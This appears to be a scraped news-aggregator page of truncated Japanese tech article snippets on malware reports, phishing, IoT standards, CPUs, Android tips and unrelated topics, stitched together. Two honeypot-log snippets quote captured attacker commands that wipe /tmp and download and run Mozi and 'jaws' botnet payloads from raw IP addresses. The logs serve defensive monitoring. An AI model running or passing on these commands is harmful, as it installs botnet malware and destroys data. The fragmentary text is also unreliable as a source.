EnterpriseZine(エンタープライズジン)編集部では、情報システム担当、セキュリティ担当の方々向けに、EnterpriseZine Day、Security Online Day、DataTechという、3つのイベントを開催しております。それぞれ編集部独自の切り口で、業界トレンドや最新事例を網羅。最新の動向を知ることができる場として、好評を得ています。
Researchers have revealed a never-before-seen piece of cross-platform malware that has infected a wide range of Linux and Windows devices, including small office routers, FreeBSD boxes, and large enterprise servers. Black Lotus Labs, the research arm of security firm Lumen, is calling the malware Chaos, a word that repeatedly appears in function names, certificates, and file names it uses. Chaos e
Androidが見違えるほど便利になる。ホーム画面に加えたい15のショートカット2022.01.18 18:00277,540 David Nield - Gizmodo US [原文] ( satomi ) もう元のAndroidには戻れない。 Androidはホーム画面を好きなだけカスタマイズできる。そう頭じゃわかっていても、あんまり使いこなせていないのが現実。特に盲点なのが、ショートカットです。 そうです。よく使う機能や設定、連絡先はショートカットにして、ウィジェットと同じようにホーム画面に表示させることができるんですね。追加方法はかんたん。 ・ホーム画面の余白をどこでもいいので長押しする ・「ウィジェット」を選択 ・ショートカット一覧から加えたいものを選んで好きな位置にドラッグ これだけ。で、要らなくなったショートカットは、アイコンを「削除」にドラッグすれば消えます。 この便利さは
ハニーポット(仮) 観測記録 2022/09/27分です。 特徴 共通 zgrabによるスキャン行為 Apache Tomcatへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス GPONルータの脆弱性を狙うアクセス curlによるスキャン行為 /.envへのスキャン行為 /.gitへのスキャン行為 phpMyAdminへのスキャン行為 UserAgentがHello, Worldであるアクセス を確認しました。 Location:US D-link製品の脆弱性を狙うアクセス F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス GPONルータの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス curlによるスキャン行為 /.envへのスキャン行為 /.gitへのスキャン
印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます 2018年4月に設立されたフライウィールは、「データを人々のエネルギーにする」をミッションに掲げるスタートアップ企業。GAFAM(Google、Amazon、Facebook、Apple、Microsoft)をはじめとする外資系IT企業出身のエンジニアが多数在籍し、データからデジタルトランスフォーメーション(DX)を実現するためのデータ活用基盤を提供する。 代表取締役CEOの横山直人氏は、Googleの日本法人でエンタープライズ事業の立ち上げに携わったほか、Facebookの日本法人で新規事業開発とパートナーシップ事業の執行役員を歴任。取締役CTOの波村大悟氏もGoogle日本法人でコマースの検索などを担当し、Microsoft Dev
印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます Microsoftは米国時間9月29日、オープンソースソフトウェアと偽のソーシャルメディアアカウントを用いるハッカーらが、架空の求人情報でソフトウェアエンジニアやITサポート担当者らをだまし、マルウェアによる攻撃を実行していると警告した。 同社のAPT(高度標的型攻撃)リサーチグループの脅威アナリストらによると、このフィッシング攻撃を仕掛けている、北朝鮮の軍部に関連があるとされるハッキンググループは、トロイの木馬化したオープンソースアプリと「LinkedIn」上でのおとり求人によって、テクノロジー業界の従業員らを標的にしているという。 Microsoft Threat Intelligence Center(MSTIC、「ミスティック」
9月30日より、Ryzen 7000シリーズの店頭発売が開始された。いきなりAMDマニアの林先生がTSUKUMOeX.の店頭に並んでいてさすがと思った、という話は置いておいて……。 すでにKTU氏による性能ベンチマークが公開されているので、その性能と消費電力の評価結果は記事をお読みいただければと思う。大雑把にまとめると、「性能も上がったが消費電力も上がった」というあたりである。 消費電力の方は、1つにはチップセット(X670Eの場合、2チップ構成になっている)が理由でもあるが、基本的には5nmプロセスを省電力化に振るのではなく、動作周波数向上の方に振ったのが最大の要因であろう。 一方の性能の方だが、これが以前説明したよりも、もう少し踏み込んだ情報が説明されたので、このあたりを今回説明しよう。まずZen~Zen 4の変遷をまとめたのが下の画像だ。 Zen世代のIPC向上率はExcavator
by Isriya Paireepairit 以前から、AndroidやiPhoneでは画像にマルウェアを仕込むという手口が発見されていますが、新たにWindowsのおなじみのロゴマークにバックドアを紛れ込ませる恐るべき手法が見つかりました。セキュリティ研究者は、中国政府の支援を受けたハッカー集団「APT10」と関係が深いサイバー犯罪者によるものである可能性が高いとして調査を進めています。 Witchetty: Group Uses Updated Toolset in Attacks on Governments in Middle East | Broadcom Software Blogs https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-e
フードロス対策の必要性とはSDGsには17の目標があり、そのうちの1つ「12. つくる責任/つかう責任」という項目があります。 その中では 「2030年までに小売・消費レベルにおける世界全体の一人当たりの食料の廃棄を半減させ、収穫後損失などの生産・サプライチェーンにおける食料の損失を減少させる。」(引用:グローバル・コンパクト・ネットワーク・ジャパン) といった具体的な目標が掲げられています。 1人当たりの食料の廃棄を減らす=フードロス対策が、私達に今すぐできるSDGsアクションとなるのです。 �� P�U今すぐ始めるフードロス対策お財布の事を考えると、フードロス対策を講じようとするならば「余計な買い物をしない」といった発想が第一に出てくるでしょう。 しかし、今回は廃棄されそうな食事・食材を救出できるアプリ、サービスを使っておいしく・お得に・環境へ役立つことを提案したいと思います。 (1)
日立製作所は10月3日、さまざまな大規模組合せ最適化問題を高速に解くことができる日立独自の新型コンピューター「CMOSアニーリング」をクラウドサービスとして提供開始した。 CMOSアニーリングは、量子コンピューターの一種である量子アニーリングの仕組みを半導体上で疑似的に再現し、手軽に扱える利便性を有しながら、量子コンピューターのように膨大かつ複雑なパターンから最適解を探索する独自のコンピューター技術。従来のコンピューターでは実現できなかったさまざまな社会課題を解決するため、実業務への活用が期待されている。 本サービスは、CMOSアニーリングの利用に必要となるハードウェアからソフトウェア、業務にすぐに適用できるアプリケーションを搭載したプラットフォームが、月額制のクラウドサービスとして提供されるため、開発環境やアプリケーションの構築・保守が不要。導入期間やコストを大幅に削減できるほか、物理・
ハニーポット(仮) 観測記録 2022/09/28分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス zgrabによるスキャン行為 /.gitへのスキャン行為 Location:JP NetGear製品の脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス /.envへのスキャン行為 phpMyAdminへのスキャン行為 UserAgentがHello, Worldであるアクセス UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 185.216.71.192/jaws; sh /tmp/jaws Location:US Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス Liferay Portal J
ハニーポット(仮) 観測記録 2022/09/29分です。 特徴 共通 /.envへのスキャン行為 phpMyAdminへのスキャン行為 Location:JP GPONルータの脆弱性を狙うアクセス /.awsへのスキャン行為 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 185.216.71.192/jaws; sh /tmp/jaws cd /tmp; rm -rf *; wget http://192.168.1.1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws Location:US GPONルータの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を
猫にダイエットが必要か見極めるためには、猫の体型を正しく評価する必要があります。そのための指標として「ボディコンディションスコア(BCS)」があります。 BCSでは、痩せすぎから肥満までの5段階に分けて体型を評価します。このときに、やや肥満と診断されたら必要に応じて、肥満の場合はダイエットの必要があるということになります。 BCSで猫の体型を診断する際は、肋骨や背骨を触ったときの感触、猫を真上や真横から見たときのくびれ具合などで体型を診断します。 肋骨に触れるかどうかチェック まずは、猫の肋骨に触れるかどうかを確認してみましょう。猫が床に伏せている状態のときに、前脚の付け根からお腹の方に撫でるように手を動かします。このときの肋骨の触れ方で肥満かどうかを診断します。 痩せている:簡単に肋骨に触れる。ゴツゴツした感触 標準体型:肋骨の凹凸をしっかりと感じられる やや肥満:かろうじて肋骨が感じら
PCのシステム構成をリモートから取得したい! ネットワーク上に存在するWindows PCの一覧を調べ、それらのシステム構成やOS、ネットワークなどの設定情報を把握しておくことは、システム管理の基本的な作業である。 といっても、いちいち各PCの設置場所にまで出向いてシステム情報を収集するのでは非常に手間が掛かる。可能ならばリモートから情報を収集するようにしたい。 Windows OS上でシステムの情報を収集するためのコマンドには幾つかある。そのうち、本Tech TIPSでは「systeminfo.exe」コマンドを紹介する。これはコマンドプロンプト上で利用するツールであり、ローカルのシステム情報だけでなく、リモートPCの情報も収集可能だ。 「systeminfo」コマンドで表示される情報には、コンピュータ名やOS、メモリ容量、ドメインコントローラやメンバーサーバといったシステム構成の情報、
バッファローが提供するルータやWi-Fiアダプタなど29製品に認証を回避される脆弱性が明らかとなった。公衆無線LANサービス「FREESPOT」向けの製品が複数含まれているほか、設定によってはインターネット経由で攻撃を受けるおそれもあり、利用者は注意が必要だ。 29製品において、認証をバイパスし、機器にアクセスすることが可能となる「CVE-2022-40966」が明らかとなったもの。 このうち16製品については、ログインしたユーザーによりドキュメント化されていないデバッグ機能を有効化され、任意のOSコマンドを実行されるおそれがある脆弱性「CVE-2022-39044」が存在。またハードコードされた認証情報を用いて設定を変更されるおそれがある脆弱性「CVE-2022-34840」なども4製品において明らかとなった。 脆弱性情報のポータルサイトであるJVNにおける共通脆弱性評価システム「CVS
近年はAI技術の進歩によりさまざまな変革が起きていますが、政府機関に使用される顔認識技術の精度が低いことが指摘されたり、イラスト生成AIがアーティストの権利を侵害しているとして批判されたりと、人間とAIの間における摩擦も生じています。そんな中でホワイトハウス科学技術政策局(OSTP)が現地時間の2022年10月4日、AIがもたらす害や差別からアメリカ国民を守るための「AI権利章典」の草案を発表しました。 Blueprint for an AI Bill of Rights - The White House https://www.whitehouse.gov/ostp/ai-bill-of-rights/ Blueprint for an AI Bill of Rights: A Vision for Protecting Our Civil Rights in the Algorith
GoogleやApple、Amazonなどの数百の企業が参加する、モノのインターネット(IoT)のオープン標準を定める組織「Connectivity Standards Alliance(CSA)」は、IoT用接続の新しい規格「Matter」の最初の正式版であるMatter1.0標準および認証プログラムのリリースを発表しました。CSAはMatterによりIoTの新時代を先導する意を表明しています。 Matter Arrives Bringing A More Interoperable, Simple And Secure Internet Of Things to Life - CSA-IOT https://csa-iot.org/newsroom/matter-arrives/ The Matter smart home standard officially launches to
フィッシングなどのなりすましメールは増加しており、メール文面も違和感がなく差出人もなりすましているため見極めが困難です。なりすましの起こる原因と技術的な観点の対策を紹介します。 日々受信するメールの中に、身に覚えのないメールが届いている経験をされたことが一度はあるのではないでしょうか。こういった受信者の同意なく送られてくるメールをスパムメールと呼びます。商品の宣伝や出会い系、アダルト系などが中心になりますが、中には大手企業を名乗った偽サイトへ誘導し、個人情報を窃取しようとするフィッシングメールや、マルウェアに感染させて攻撃を行うための踏み台として利用しようとするマルスパムメールといった悪質なものもあります。 フィッシングなどのなりすましメールは毎月増加しており、フィッシング対策協議会によると、2022年6月のフィッシング報告件数は88,250件にも上ります。主な手口として、まず銀行やクレジ
Bumblebeeといってもハチではありません。 Bumblebee Loaderと呼ばれるマルウェアの話です。 Bumblebeeは2022年春ごろから観測されるようになったマルウェアです。 当時はいわゆるよくあるローダーとして見える動きをしていました。 しかし、同じパブリックIPでインターネットにアクセスしている組織内の複数のコンピューターが感染した場合、C2サーバーは最初に感染したコンピューターのみを受け入れるという動きをしている点が気になりました。 最初の感染以降、Bumblebeeは多くの変更が加えられてきました。 配布ファイル形式がisoだったものがVHDになったこともありました。 細かな点は多く変更されてきていました。 そんなBumblebeeなのですが、最近また動作に変化があることがわかりました。 複数もOK 同じパブリックIPでインターネットにアクセスしている組織内の複数
フィッシングなどのなりすましメールは増加しており、メール文面も違和感がなく差出人もなりすましているため見極めが困難です。なりすましの起こる原因と技術的な観点の対策を紹介します。 日々受信するメールの中に、身に覚えのないメールが届いている経験をされたことが一度はあるのではないでしょうか。こういった受信者の同意なく送られてくるメールをスパムメールと呼びます。商品の宣伝や出会い系、アダルト系などが中心になりますが、なかには大手企業を名乗った偽サイトへ誘導し、個人情報を窃取しようとするフィッシングメールや、マルウェアに感染させて攻撃を行なうための踏み台として利用しようとするマルスパムメールといった悪質なものもあります。 フィッシングなどのなりすましメールは毎月増加しており、フィッシング対策協議会によると、2022年6月のフィッシング報告件数は8万8250件にも上ります。主な手口として、まず銀行やク
Appleも推進メンバーとなっているConnectivity Standards Allianceが、現地時間2022年10月4日、スマートホーム規格「Matter 1.0」をリリース、合わせて認証プログラムを立ち上げました。 Siriがさまざまなスマートホーム機器に対応 Apple、Amazon、Googleなど280社以上が名を連ねるConnectivity Standards Alliance(CSA)は、現在各社がそれぞれ提供しているスマートホーム機器とソフトウェアが、互いに互換性を持つようにすることを目的としています。 つまり現時点ではAlexaやGoogle Assistにしか対応しないスマートホーム機器が、今後はSiriにも対応するということです。 Matter 1.0のリリースに伴い、Matter規格に対応しているかどうかをテストし認証を与えるラボがオープン、Matter対
ステガノグラフィーというものがあります。 画像ファイルを用意して、その画像ファイルのなかに他のデータを紛れ込ませます。 出来上がるものは画像ファイルですので侵害環境に運び入れることは難しくありません。そして、そのデータを使って悪事をはたらくという手法です。 ハッキング技術の勉強で見たことがあるという人も多いかもしれない技法ですが、実際にこれが悪用されている事例というのは多くありません。 そんなステガノグラフィーの実際の悪用が観測されています。 中東とアフリカの政府機関が攻撃を受けています。 その活動の中にいくつかの新しいマルウェアが含まれていました。 そのなかに、Backdoor.Stegmapがありました。 名前が示すように、これはバックドアでステガノグラフィーを使用したものになっています。 こんな感じで攻撃されていました。 入口はMicrosoft Exchange Server 始ま
国連の枠組みであるWP29とその作業部会による自動車セキュリティの標準化が議論されている。セキュリティは次世代車両の設計、製造には不可欠な技術要素である。自動車セキュリティは、車両ハードに関するものとソフトウェアプロダクツとして見たものと両面で考える必要がある。 たとえば、SBOMという言葉を聞いたことがあるだろうか。また、リスク分析を行うとき、セキュリティ対策を実装するとき、車両をIoTデバイス、平たくいえば「家電」ととらえた視点は非常に重要だ。 自動車にまつわるセキュリティ対策の標準 WP29の議論は、機能安全の規格であるISO 26262と、それを車両に適応させたISO/SAE 21434。そして自動車製造に関するセキュリティマネジメントを規定したUN-R155、OTAを前提としたソフトウェアアップデート機能を規定したUN-R156といった規格が主なトピックとなる。だが、これは自動車
Innovative Tech: このコーナーでは、テクノロジーの最新研究を紹介するWebメディア「Seamless」を主宰する山下裕毅氏が執筆。新規性の高い科学論文を山下氏がピックアップし、解説する。 中国の南京大学、香港理工大学、香港城市大学の研究チームが発表した論文「Knowledge-enhanced Black-box Attacks for Recommendations」は、ユーザーに応じてお勧めするコンテンツを選ぶレコメンダーシステムにハッキング攻撃を仕掛ける手法を提案した研究報告だ。 顧客にパーソナライズされたサービスを提供することを目的としたレコメンダーシステムは、ソーシャルメディアや電子商取引を含む多くのアプリケーションドメインで広く使用されている。 レコメンダーシステムは、Recurrent Neural Networks(RNNs)やGraph Neural Ne
はじめに データアナリティクス事業本部のkobayashiです。 PythonでJSON形式のデータを扱うことがあり含まれているデータを簡単に取り扱いと思いJSONPathを使えないかと探していたところ該当するライブラリがあったので試してみました。 環境 Python 3.9.10 JSONPathとは JSONPathは、JSONからデータを取り出す仕組みでクエリを使って要素を取り出す方法です。これにより複雑な構造のJSONデータからでも目的の要素を簡単に取得することができます。 JSONPath - XPath for JSON jsonpath-ngライブラリを使ってみる PythonでJSONPathを扱うライブラリはjsonpath-ng · PyPI になります。jsonpath-ngはJSONPathの定義 に従ってその仕様を忠実に再現しているためPythonでJSONPat
PostgreSQLをWebブラウザ上で動かす「Postgres-WASM」、オープンソースで公開。Webブラウザ上のx86仮想マシンで実行、レプリケーションも可能 WebAssemblyを用いてWebブラウザにx86の仮想マシンを構成することで、PostgreSQLをWebブラウザ上で実行可能にした「Postgres-WASM」がオープンソースで公開されました。 Today we're open sourcing postgres-wasm with our friends at @_snaplet Discover how we built it, and the extra features we've added: https://t.co/6kmfXBBhCS#postgres #wasm #opensource — Supabase (@supabase) October 3,
金融庁をかたるフィッシングメールを確認したとして、同庁や警察庁、フィッシング対策協議会が10月4日に注意を呼び掛けた。本文で「1日以内に個人アカウントの審査と認証をしなければなりません」などとして偽サイトに誘導し、クレジットカード情報や個人情報を窃取しようとするという。 件名は「【金融庁緊急連絡】重要なお知らせ」などで、偽サイトのURLは「https://●●●●.icu/jp」「https://●●●●.shop/jp」など。メール本文にはリンクや、金融庁のロゴも記載しているという。 偽サイトは金融庁の公式サイトに似せた作りで「金融庁と警察庁の安全改革法令によって、2022年10月1日より、カードを所持する日本人は「マネー?ローンダリング及びテロ資金供与対策に関するガイドライン」に基づく審査と認証の実施に協力しなければなりません」(原文ママ)などと記載。住所、氏名、電話番号、クレジットカ
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く